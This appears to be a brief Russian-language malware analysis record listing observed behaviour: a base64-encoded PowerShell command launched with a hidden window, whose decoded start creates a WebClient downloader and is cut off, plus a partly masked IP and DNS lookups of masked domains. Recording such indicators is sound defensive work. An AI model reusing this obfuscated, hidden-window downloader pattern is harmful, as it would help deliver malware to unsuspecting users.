Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMADYANQAxAF8AMAA2AD0AKAAnAHYANgBfACcAKwAnADUAMQBfAF8AJwArACcAMgAnACkAOwAkAHIAMQBfAF8ANAA0AF8ANQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSADEAXwA3ADEAOAA9AC...
- '17#.#2.226.34':80
- DNS ASK am######nhsangtheanh.com
- DNS ASK qn###ker.com
- DNS ASK di###ietnam.com
- DNS ASK ma####aanloop.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMADYANQAxAF8AMAA2AD0AKAAnAHYANgBfACcAKwAnADUAMQBfAF8AJwArACcAMgAnACkAOwAkAHIAMQBfAF8ANAA0AF8ANQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSADEAXwA3ADEAOAA9AC...' (со скрытым окном)